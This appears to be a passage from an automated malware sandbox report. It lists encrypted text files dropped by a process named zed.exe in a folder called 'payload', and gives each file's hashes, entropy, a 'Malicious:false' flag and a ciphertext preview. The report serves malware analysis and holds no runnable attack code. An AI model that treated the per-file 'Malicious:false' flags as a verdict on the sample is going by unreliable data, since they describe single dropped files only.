                                                                                                                                                                                                                                            SSDEEP:48:LBNVBiCUci7GNgRbF90jgxZmOk80cmrgSbd5Cf+:LXNzObF900TGcugSx5Cf+
                                                                                                                                                                                                                                            MD5:3F0492D97F0F62C1E267D7B68753CBF0
                                                                                                                                                                                                                                            SHA1:9C98825ECD0346CFC7D8CA8689987A38F974665B
                                                                                                                                                                                                                                            SHA-256:76E612768DD0352E531B8D5BAF2E66B091CADFDDBD97B3D5B319FC2BA3F3B7FA
                                                                                                                                                                                                                                            SHA-512:FCD8FA935A6D123D94992FEBC277A99DACC6A70B91F931F45D3D7A4BBA353934413371E7E6A0B7A79E158AA0BC2B44A1499B5207326BC9DD380E158BFB01C275
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64LWkJt_Nj8fpO665MRstsAqitGfSicHhmxTWhgnQUt9cqQt5KEuln4QsOYuDzDf3XK4LeUrYxLfqneGUkTp0hiaRGPnF379xPgQ4eI9Q2LRdl_ZxpaNIRdK_gi9Jepd11ZWtNhXIzIW_yQey7V9lt5Y5Y9ck0X9H3iB--9qWbzpVubTArw0RZ7Mx6i9wiefM3PnOI_4bxzH65DQ1GSgB_2mkcpDOSGiKY6imWYZV8739N7yQN9M3Yu59Akex4nLk9Aog0YAonpjusCVmr8b2BGGQMIfBfOSEYmYrp2v5-qyTdvcXb-UrLMf1MGIz4QpLWkA7PYu4qju7vorCG_34GjeTqDB-ByJBZ5Wkg-F4wIgCi2CxF1ooLRrFjtNzLbEU5o2-pyGZ2Ma39uXGjp51_uBSMffPEfrgALwPccnH5AbT-yECYnKM3_K83IUhq3OTqddeAvNciq5vb09dLMkxyU76QUzfq3TmZeDwJSwAn0S9Hx8LZ7TE3oqcUHs_cd-1StnhZKXCWJ_pf6Ce0LaIsw_DU7FGVRqKOaQ_im06X5ZTBh7jw3abseGAM_G3O_jSR50dPuhknXtW84IVTRcoF4ISucaVwjaIjulF1kJwrCeU9kapYWC2v1fNvhG6D40JDzgYtC9kYg2cPykXG5IQGLvq4ffnWfc56azUudI0DQE0CDacMdW0pSzW_rrHvheCsFfxDC6rTHENiOjsoLXGF_fK7UtjzestsOHdVytFnhDpERq-e6owOxwkhXAFIqz4TJ7H5rCR4Ewzh12NoFid_2_WYThzmMEEwuKko-welHedR-bzbw2Tc10yolmPw1-al298wrDo2E9GZ1wtvhhzps7nPynah2IhdT_w2R_-dP7eHDbwZKCKwcVny7xZWgw5saMjHl-3C-9ubrSTVBmqoQnUm8SEe4KHBiXTm3PmTuok7g6hojyUfRT3gCFui3ThJWkv7E_SmfJKxF-GDYIKQQxCyeme-
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.979791688350739
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:SEr7VaDf1ScpsP4wHPjzNYde5v18BejXH20:SEncD95qdvPO45dr20
                                                                                                                                                                                                                                            MD5:6171FD96216EB0746760AF597795D644
                                                                                                                                                                                                                                            SHA1:EA0C313133D944717CBBCA8C02AA2C4FBF65D4BF
                                                                                                                                                                                                                                            SHA-256:E496282D15C3330DCAD201FC7C92E90B3786FC5EE8417C9960DB95619FD625AD
                                                                                                                                                                                                                                            SHA-512:E4E40DE045CF844DECE1AE667C6CDA2337FA52049B3225E5F8B9865C559FCF5B57376938D34AB9FD654C1EBFB0797CE9F1CC43FDC2EF33C8E9B2A053F3CA49AE
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64rdExg0PUDikqD0fJiVldNapQELHVH9JHfN7TnZLl6F7TVsPJCvTilXKZYAGGLwPOPR89_FQt63y8dWso6i2FVAxa1aLhM2PDDITK9fnLxY261QArka50arYLz9KgjSfiQVZ6wEadkJy5dVFCvCf9Ck4cijupM31Ev5RyESAygfFeIGHm9JcSWTFM1aWyd4G6PIwTPW_AQUmbN8qerT_Sf1EuknpPjoB1_imqVDVy0YQqu0cQ5sXBYv-KrFkBJ3ULcwp0aNg8xag_dLh4-Y1j3ZuH2pd899AyPHfrb5tY3gkkxwPOTUoXQ_bjMSiTIddhan5R9MsYIQyL9DMWGHZ_JQgp7bCWJfjVWb6Zk4izzHbjeHLGXVidE4l554e0gxSnr5i1SuhM2J3t1-tidfdqP9eY-q1efJPEXDOHwwbPHLn8Os5FtsEUh5n-qS22WdVVgZFezdFyfgpRaNuuyXaiPsggpZGd2VRNxvFHQCcy4W72k51eHK-FyB7hN8WQbddMkC63GeC_89UfZSRE9RQ2zIJi3WCKS1wZ6pglTYDgLGKZesjVT2b6jmNa30oAl_rixwnRa9iVxyDkvwQhM4eugDzAxzqXTOTJi8ziWRhTSXXiaFUYLbzUpUO7KZYWEGm49amhV7vgTQHRKVrY9cavhnSvQAwE43h__GwtLsVKf15aOAwMaOE1u_zHS-cf6JFvTNKS3SCKmtZqnwDB4R9q_rf8bAIN4VEGYu-6ZtU76dPaWIzggvFDgu-xhj6OeCeaIPKAP0C_n_AWTiXQuNZylaECZUp0p8rYd-45XAT3qlDhx-EeaojFwrHm99iMjj4ttyPH272ePzU8Z0Efh75SHFuVyrwGOKfPO2_J0mAbIPM-DA_i35l7Bx6PytLMmCOhgNxdVnwVgHhXvxS6GAsFRpsPytPHe_sB5jx4jrAHKJ8ffTrHWDbHvLZGMfG0Mmoc23eYL5eIPJeMHOZvPArnf5ydP4sg
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.976972232892288
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:W0QHfiiFPXR5DkrRW5PY68KqtZJoljN3ysKlKlNBuzo81cAixft/Ko7AWyfM6WOy:TergrRW5dqLJYNhbvUzorfNAzEUfmWi
                                                                                                                                                                                                                                            MD5:CF14DF481D097D5EF5D8BCABB2216595
                                                                                                                                                                                                                                            SHA1:4D799A360BD7153F0CDE75D0C5A96167E86B5B83
                                                                                                                                                                                                                                            SHA-256:325CF3B1AD7CE46EAA4EFA696A49AA4479C754403066336C19D60CA8E0F03F4D
                                                                                                                                                                                                                                            SHA-512:32DDC5D3EF410661DFA8609FDF633E038886F1D658B3BC91D0017FC85956192F270FAD3A4CA9F86CB59A05A9B321C9268215129526310689E93A99F91F41A409
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64p9v1_FLc3IcbAxU7d7gPNz1MzI7_14-l7WdfQXSf5xHUWRm8SbQYj02qQbagEUSNzAjUk3V6cEJRnvGP8eYOzD7jmA1j80Wr3_QEsclT5xocq1LWMMjgd146Z9Az2i_XzJrv0LJowmicdaGygyPUtqh3wqqDV_vAakH2zTYzv0aTdMdT5py056ts0la6vi1XKIuXP4NxiQfXYu1Vu2cElP7ouiWllepzJcb-FtQ4C4mKRFM4n-qOCpgbdmS4Dqe2vkZT9ibkroBfD3VG33l-iQftHAP0cuSMhX1JMPAZr5_O1KIzEjrFVym5IobSVc3Eo1jU57RI9Q1tqOantNkcavjKFEl79XyZ2IJuUnGQcxKA5E6i2PxoeVvBn3B_obxShPGSNOobktHOQAQpi0MQjffZ5Wh0F9CuDndrnuEPKRQ-QSEBsewIbk7t_Kb7Bp1bTYbAKcrfE-galmkvrR_yEbv_nFp95QX_FjWFoKYA3f7mjlui3PJwkHug5P5JqogebVW6iyF3lSUdAPBrg1cpp3jA9zDkctLLnxm6uh7ukoUesiIC303eVp7xkxnUt8qfXYHBH2w6v6VojnFW7y37Uw1IWm4taFShdf64mNuX_NAVS_7sThGRYUxZTlRc3aD31h05yLMYmD04oabU_Z6PTqPYuG62ROMv0NDzOgYVYCxY12IjqyCAK5AoblQP4-HkNGtt6JDd4o1MWfLKw6SDHgjPbgM5cVHVNoPxXQh6GR8nI4Eku1D2RRrPypLlI9FfPSxGd7tI11pAw1Z5lY3ZS76Sdm0jW3n1dXxYZAmHN-MLaeweqZ18CeSjrbp4mcK7dPYdWtpWH8du5lub8OQqznDZtW4azTlVIiLeFZ-wpt15AhA2Y6WxeiLNlMbkzwY1rCyihgi1FS1RrBe2waPdTIJSS78efKrLUrqZmSAje4nICErEAiPwmXUxHH55Mrxt3mzQntmquUoZigPlIJDErAGildrZ
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.987101337716354
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:6g1cK/RKYtkbMRZ0t+8Wb+KEBKlWXIFv7uuwn:6T4Rfy5c8w+zwWXZn
                                                                                                                                                                                                                                            MD5:287BF0CE13471A867A3447134BB6EEC5
                                                                                                                                                                                                                                            SHA1:A81ADF52B81A222F5F88E36A7813AB741536370D
                                                                                                                                                                                                                                            SHA-256:8E06AB7312BFAB875D644B1D934EAC702D4BB01220D2C181B3C187A6A678874A
                                                                                                                                                                                                                                            SHA-512:F7870EDD1678B851A2AF271AF5FE461A88C8D036D3A49EB1BC20C8D9F10C2E63C45BFB88DF72C9002423436BCD098ABEC06B46EEC12503FCE07FA35E382E71D8
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64AA7JkOdCaPq11C08-cvMOeeU7BZqRo9BSOPDM_s5NXdnhh49ugWHqbniTPEK9TKSiuQ6xVpFOi46zgBV2MU4dOaHBugK5aS9DS84YQvLEEE_a-Ht8ncpV1LizeDDpsreA-s3C2GC6gDWNh8HZK1L1jTzITl5G9FS0pHnZ1x5oLqCjDilVUaWsYxEjmY9MXcJ6RVUUIYlEIknWkSmpoEckzCofQerucOdamP9zH6u2AScU5XIae23Jjo7ex9YhpFPG4kJF3gtDXas6Q59OG_fiGmpMSfqSYBu0w3-RHJwKWVRWURlCD9foE4A5e4HyNctMhS6PqEuU5aJiPBKfYct6su7jCo6iQqPkGCG-ykLEZzobWO9FoTgu903f9fvRvhJJpJe8gVeXR0FAOisc_gWKzJZSyqVpcQldOwGqdI6Iplzl1lqCTEVSipas2nzGPi_jwSDypdSxpHl5x15vWnYusbl3x-iMVZLdxl-GWgFdFaX0LlgpzJNtytOC7FtzMK9MNxfF2T803NwLi8WItLDWHSZ3U5j114W4it-rqVT6u97P_eXQwE_JWia5Fik5G0z5FOrfl4PI1-wEZKI4R2hb7yXn_IWnypGbKHy2b8dbpNyRdELtHzfByZ5b2YkFffavoePMNYXjDtJPhfCjCMDbhsVaa-cmIOR4LbpAuiFy1iVKtpGxeW8cCtc7ogXpwd6Ibw6oSxWePqmZP2A3UjIRHO4bxJQNrDkM_Ksfb11khCBtXpCJ7aE8QXjp2G5js6WhI6QjQ7WKmcdLYH0oIQLyC3bzmjng3j5VGC40dWKPYI5jPSMNZE68PPLa4DyuoL5tQj9Hab8ZLM5Q7L-CNun9BpVn8jGqna6jFqRxw5-hBYQErmFi0UUm16a8FAw3cvs-EdNvW2i6i9g4fAp7v8vld_Z8QS3JHkuQdP6kwNiRoS372OwH0qd0kz5VaGMlcC8VrKWj285DqIgELd9G8hmV7eLWt4c
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.9752914838037645
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:EBTAWBxlLP4ZsB9h1PKh2k5Z4Y3rW3Rfffmpx34u8S4Mmr:EBTVBxDhBjkH4srW3RfCFB4Lr
                                                                                                                                                                                                                                            MD5:8FDEC298F3894C7F33C4D19FE7EFFF3A
                                                                                                                                                                                                                                            SHA1:9E2524541231D75C10EC8519CDD5ABDD84617D31
                                                                                                                                                                                                                                            SHA-256:2B78B3AF4E3D087076106B9DDC19003AB0D445CAE05E517B730BA79011D475EC
                                                                                                                                                                                                                                            SHA-512:31EC429FF63FBD71EF75806E4C13E50BF8A634BE51A7589F97282E7277420F9A11C498741F808C9E2BCE8169A3C8511306EE852912D0257BBF2838899596915F
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64ncb99rOyTATQTDwJmZJvq6JsudcMxajACX1CUG49hXBOyGZ24BWM8CJ4pbG7PjXQ-cluNavrKUPBFHEdXjZhkn4gpxa8YiZmtfxcWwrBBY8dk8FSnHj22Oc1vGeqeqRzWrgoAxJV9cBjvTGY_C59faGWj3zltEGD8-rrV7fde9QXbMkzMepOOEKBCThaBzOblLzAd2miT1aaLGhE255qjxRtwAOOwSb_uBxLrEpWBOPoo1raOj2kGRFr9GtBowyJmhUT9Z7sS-wlkqegsF_Rva4iHXV9XhKR0thVKeWbkPyNodbeQrq9VKtL8Wst7tuO8c47DtdL9_RZNYYuld5PoVXLtrUtQ2WHhdk6DJo89l0S4GOrbD9ESdu6nhiA43Cv86OTFXlgj_5pTNz-VwnXWJAECR7253ghn4NzTxSq6AXNwycLjDvfdldafiNs6CW8DQK9I_4XsFW71cz0QZ05xy9qjOjqZT4gV0tA5QZk3WMxxTpJJD13-XDmlO_f6izDkEePMzlEtJGshdsGIZxkFIjhcUfeuyRPCsFSQh3uQPOvXJUTLue0tvS4jE5c8HYE_CUSJKcjBSq8DIBhmMxFtv0I47fsupbOAXUezM-sybANO6XdALCZLT993-vKI59CH2WU8s0fpXM36eZjzZEFmJILs60rFAIOEWOTYUIvn58dAczJJqKGl9PdcSOdtOMuarxvNYbPn0hWRU3WO1D-nvpbIMnk5PTJgpL9Zkbow8F1Z2lrfFhSzOWpjwHP0FlKYm_c8EkSyK2gjc8nwJ5BDcAMRG2Q3yY4odf-IQpJ3tgyjloHRe7VBrHwWj5LFoE4YPbmmkQXjSJU5ahNSgtmPTnX-wOJ8jareBvLjTKu_8kP5C7d3sgo7UoDgq1nrbb7F4aYF7OYBg1IXcxLb-qHvXUFBkldCZ8zSi7KlSe8T8E_VAEgGIVWN1PjYis_tXkt_v9NLPE0Wu2YdFUPpOu-YUOAAZkz
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.978711906942523
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:WojaECcUjR8ityvXY1vHFODEdjQ6nGwUxpPWSTF1oGwEmU/u64OklGc1ZA9C4NPr:to1xcgltnyx71oGwEVz4OYZAwblBTC
                                                                                                                                                                                                                                            MD5:0A0DF27A8005AD2F231514E71057E358
                                                                                                                                                                                                                                            SHA1:185CFEF6A564F5B7B568534890F0C19F899AC4C4
                                                                                                                                                                                                                                            SHA-256:0CEE7391B235355D8A61C8001A411C5E0FBD5386D3259255DF76FA1292521153
                                                                                                                                                                                                                                            SHA-512:33B5F14F0F1AD2E4C59CB061725CB9CF6C875E5997028A3A80AD9A7B17F65696B25F812481799454017D2D7DDE07F13BB21B4340358223D9E1F3C55B80BD4229
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64V-UUWEgKLy9SjACn9tIiBi0TG84etIt-GgErwBmuuzPvpJYo_4y4MllfnpYMrmVvvKTXRbzLmgjCzldkUNc_XhtYKos8JpF8ULFuk-burQoApxrEY0NIbfJ5ax7tTr-dEmsFEk9MH5OXsr3nehxIoVjwld2P40OfmLvOXduhfYVrpyJvWmrA_qMwdc_KygIAnA6o_3_ueyGCwt9_dH6HnheuhGnO3yNz7lDcMLGfVd5qE0_5ibXmzAH3H1j1Y6y5H6YIruSHpAS44QxOCY-IcrZoW3hE0ewXNpvlE45JpQ_kunDgItKM_drx_KZ1sBC4qMVE28Lzfu-20Df-DZ_HFLw0MWUSeGzEj0zkqtlzlIftDtVIlnBe8VYj2vF_UW5Zb5YPBTyFyw4YpvJMBgwT-HBfeK40O4E5b7mRoEPllbBqUl4SsLj_BSrwoCGabH4GoPCk7NBCbds3oIHTw4saVJpkHB3KEJ5e6GQVlppVln2Glb8XfBV0TFnjw3wYzUpnpQYE4oACpnIrU4mBdEUKlPMTeUBqfBN_KIf0RGMT02EG-n08cpfN7xwbdMaptNurdNpI3z1J4qjzAmMKn64NvlswaipKcU_dslTsIC0EknAT7pdQjA7wnjnYM113-W1574xn1xmHw316iP4hLKPy9lB1wHKe2XqzvmOe8QWGKFxHzsya1ecVpmtpkuRUisPTPnVb9QFTu6gXwwuxTUUsqhOg1fItbDqSPj7x7F0QXvQ7byQpWd4tmFgWVqu_pbk7GjOdVfRdsIPGeZoFAiweIqkDB22fx9UGKylWY7pao-QRRw91R-7yFHlrOtO8LON48pOZwIPF4t2fGsM8s3cV8z47jHcaeJ2A4_Yc6Wq3ERm44YJfCBrSgr4of-Oa3ByoH2N6x5HM4g4zeFClfA1gx9aTt1vP5D4V4l2Z6EV9PLbU1LDW1_umORco-pzZvwmXv42rRiutQLqtnQ1FVPj6q2O15wvK
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.979270299112023
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:24:WWASjd6eYCTbYIH4ZGgeMrHbdjvLvK56LGB6U3vHrlBsh9+uGtF3FO6TfWA+K9JD:/AqTYCflq3hLXyJvZGQuGtFhbrzA9/Al
                                                                                                                                                                                                                                            MD5:FA5224CE8D1C7FA3EAD152F44D7288B0
                                                                                                                                                                                                                                            SHA1:DA03DEBC357423674B131E21344A8B640D71A69C
                                                                                                                                                                                                                                            SHA-256:720329FBB82836E4B67E9744B1007BA3F5A7B0BE364795360A58CFCC87A94604
                                                                                                                                                                                                                                            SHA-512:93195424814C9218446021A0EC93D92AC114616DF519C3D6BA8BB3CF46590C8B8D55CC7DF0E80A25A4D17E9392E5BB4F66A7F83D157B7CC8B4880F7527513428
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC646RuBU1UML2TBOF1PgUX-rpj2EeNrhyQ40OwHBL1QJOz4UfN53Vbt-H1sVBHx7i9WBbdInOEkH3e1HarNJ34c4tVPYP1w75yH4is50teT3aaL8JpHtAdhB6n6LEKHc_GLg5D586E2jI82RRf5hPlzW4j_1MZyAOMHOqboykLMacrw6Ayi6yfhDAFKYEmO4jxpUYfO4bVuYp6gPY3d39-RiW0CjdZpHNuLTeQNY5f4mfuGBWeiXJqF0KbrBlIz75T85Ju6U9hHluvrrGo2j3KmY6iXvXYtOQ6JRMiHdc0VXBPofMp1h5Bx3TlVOghqQQ8jXeCHnjOCA1GUkCoYXtpHfydbpYQ3dQlTLEkNRhMLRZ1DU24rmmMtrU9yXLBdOODMjbqAOBGb9tBbTdK3OgXU4xqgE9ZXv3xMcJZnJZCL8YS_EXreozSBCDswvOYBRFksm-qwa3qclJeoO_b1IN6L7ly45RQPn3ZdU43GIS0aaGIOSfjeFH8C2oF4CGxe7X-bp4ixUQVKP98RMPD8YMPlzeQxwuiGHqrpXfFbDW8lqSSmvLhCCeU2ZR8nhJ5cfdPCVnXcnMjzpxLFFLN5Tub9aIjSYSS6XzLL5v7w3o-Of1tktSnTnxFPUrFn3FJBXzq3YuEtqHfjXzTwpvfnCvSqUf9sSAgUyY5EGZwfMLYLHXhVrgC-fuwR0r8_Le1HhPdA3v4rK7YvigNCHZ3I3F8g0aoLJ0XBFDMv369JqiHbPGUw9nijCA-oGZwEX09UKP4VDk8xURPYkPpBlwGXzWvXhhE-nT9u1BiSw856pl8N6AzdKF_d9CSj4kmnj2pATvAVVXky-iTaQlaCFYeJ_6NsVsIESzEgqS6anF1aMvYUKwfFuW7pFM5VoAvCbLeBxFBAcWKkCChXosNMzSMO-hmZwtN7WPOk9BTyYNAtIJ9U4vSEpjfZDtQhCm7d8JQKJdf9WY3Td0gFaC1_38MCc46tuCe3aoFq
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.984254035272075
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:3+FqUIlmQHsSuQWQcFdXBYsVBO2PMeBNQJJgseg1muAM:EHILH1zmF9+2P9BN8gng1TAM
                                                                                                                                                                                                                                            MD5:8E82D21A1D208976BE56E4C6731BA42F
                                                                                                                                                                                                                                            SHA1:6B2799A65DCED810487E459153FE622EAFB87160
                                                                                                                                                                                                                                            SHA-256:C324444FCFFE5873243F49782D760F77DADD4CA88FC04B4EA9BFDD88AA1EEF18
                                                                                                                                                                                                                                            SHA-512:D299078D7FE82103B0FF38F2D31076A72A1230D95398CEE0D9E891EC2F9E8160136EEE5ACD4FDF0B858E41C46764F85EA5E3793367EB347519A1321D588B7501
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64Hi0T5jIm7Lf6GOL1ELR4EI8E9xRixjL_sOzZi02KM29V8vlN2baP8_AdOlm5SuhpoWfI6r0sLu2nWTrgJs10incb5dR7yau631GwdnSYUlLGb_OMnTmkCpRXtXxDlqSjX2XPuc21HpByz2wwHGt1utnMXc4DJlcRXkMoZC7e01k-E8qZxY6caN3ON5uq0LN8dmM9MBsiTnNbeLMXA5ZHBWwsM6SI1TOhzvtLuSMtV0chov1eTxJFxBq0_-Tprco1ZsqFHbvP9Q0Hs4VDn1PxUMKpzq1wSc_64bVXD8RDidUZ5VpZ-t3ipKyF32t4C35szF2vWeLhQYULmaWZMT2-194KmCkvzrQgc95yJH3OV3URqr-CJlH8GGuxS78ruSTlvbegReLHYOn4J37_211ixJPpC8sb5x5lVm7l9LhcVHo3IROhsWXxjMfUBPpzGJK4yNPXvvdGpgxo-qvOnhjgBL3_0oMWygFhJpE_XugTqEL1YLHsFz9kOPyetG5NLiVAvfdCdS8CGF82_WT0iHL2mIqzIgjmteL6C-WHqQQwKHcvQnY_s5IYBxmg_TEpdoei7KWFj4Wyq8Bn2eJDPPgEuauznVuk4zIOq3oEKZ3uQUecUmU2Nop3G59LnF9NBL1JtoJb0PlWeLFjA4ggJVIN7o2Yl2ajGzRsLcOZuifL5rdql6qXL79WCW7eq8OpPpFysDZ3732L5IgYSYD6lN6jPI5D854KdcOdRkqQPtnRUYTGRlLsGIH7OExxkDwHsjM4UBr2fNT-gFRPuZBX5iNo7fC66HN4JucauUutS6FFBbm3MH2eVlMtDqIMgpy402tYVgR_xisHGomBfWtmrYsB8SW0548FPo_UAgF3tlJstgCTOn3hPkx0djSd6ASArETaIoYRTYhlASDmxX2ZBZHpfVipjjrq6DW9ocMCIx4L2jchZ-JDL_jGF3f81Kamatjacya7xKoHvqEBweIGrKEEqV1YDAvy
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.985669605937081
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:kOYhQMlYrShxgcE6OUzLTxSwppVUWKkQVpSgMW9pf2uNMGOD:kuZShxfEAI0akQrt3u+MGOD
                                                                                                                                                                                                                                            MD5:BE180DDC93CA3CC0EF1B851DA09E6CFC
                                                                                                                                                                                                                                            SHA1:26F409542C18E8EBA3473F94E5BAC2E93E6D7942
                                                                                                                                                                                                                                            SHA-256:7E47D289F26E6FA9CA9E82962EBD46E5D9F1509F47AA058FC56E6DADC3D6086C
                                                                                                                                                                                                                                            SHA-512:CF42BBCEF7047CBA0F51A8A7571586877A629727CA1A6C252F0EDD294310565FD94A758E223FD35E44EE4F7EA3440A4FF0CFD86683B9C7E166E48C9299550815
                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                            Preview:gAAAAABnTC64MqX7iR1mbfVNA-7ZC3RMFAMBkpETM8MNqnHryohfqyJ1mQrvruXtxmpmaAlGOCDrTehYzxS7bJPhkAq-c7MFKJ0nikD36iyerF5StzBntP_cnCN5wWNXJaIUMLswLNDoQ1v2VHhqH7oZ10XXKXkSaYOAmu7xpvNM0kVjB7QWwwc-vfgJ5CzOtBexwGyBR6kq-4UtEEnffldn5qYd1f_5sWES1bLggfl0JABvZ3s9fowcPyzeqZx4Nz5w-bQ4FvM9adECVd9c2Nvwq5tL6C6RsL5FD6pXs-LPjibT1XhfIge-o2-QnFlFkzUz7ZkKiPfj5fkuke0ANGsTxbJW22ssrlaJ4gOu9WPvJnNGeV8vQprN2EgLffr2xroKCxd7Uhb50Dlw58_ILk8LjtGeFpkweNsYLuWWTGd81DYJOy5aUxmJuqGSe2qlV4WCotVeFou0dLkCiRgRp2QuLO1Hfy_XR61WoQ1DUJAz7pYXa0cYQ-Kn49SwqG3S8_1mN4SJpWMdrInTdHo074MBkjVywEfiJShcR9_dZo7Id_XtRxTgG4WKgh7cpTo7VWmvFUIXTNEXccPEbkou7SmqL0b9mDyALWSznis01ES8ZNN62eGYjl8dQITTRUTIYgx_8Vd4sRjLPacF51HHCYmGb4sRghKPLSWgi0umU4zJUE9Q0Hom3Zgn5EKAtcmv8wkbCHr4lLoRZmlkhtALHC2RqOLI-U5RIRzQyhAyJqN7ndTmGlBftGRuFtouN3EygPSFAF9i8xSlI9VpBPFQZ0mFYSreQB9IutBk39Y_FwBIOEziIdCr-mtR6l0mZbTz1W7lcdFXtiBPPyU5CCI5yHLbzcfBxCPleizhaxEfGs8_dZYLj5BTlLGrdwK_IAJNVyi-EHVkeihI6q8ABDvtPWTiTWPCXfJ8S4zGIWxsaOBt5l_QInXEIJYmv_AksTUQ8tQg1TLiJSW54vhOvFazJv9_DYPFaoh3BuCERPK6
                                                                                                                                                                                                                                            Process:C:\Users\user\Documents\gogjothegoat\payload\zed.exe
                                                                                                                                                                                                                                            File Type:ASCII text, with very long lines (2040), with no line terminators
                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                            Size (bytes):2040
                                                                                                                                                                                                                                            Entropy (8bit):5.980819043752965
                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                            SSDEEP:48:3hCfuvOuGnxVgsNqJ/UyvRVZC6Q0pVOzJHUwd0s70:38fugACSRC6Q0pVO1HUWM
                                                                                                                                                                                                                                            MD5:09A734DD7C209594847952C777193D3C
                                                                                                                                                                                                                                            SHA1:56CDC6616BD18A4127825E164EEA52E970422C10
                                                                                                                                                                                                                                            SHA-256:CA7EBA4B8A3DCB4780C5A1357E15C3138B34574B9FFE0A97BF44A717CEFBB0AA
                                                                                                                                                                                                                                            SHA-512:4D7A2A6D7E4647B717ECE3F5452F862986A6615F3B1CA62C571E1789176CEDA33F7A81F8DE587D84E61609C83EF2BF1905CF40CC5BB2A03CB31A9763AFAF8081
                                                                                                                                                                                                                                            Malicious:false
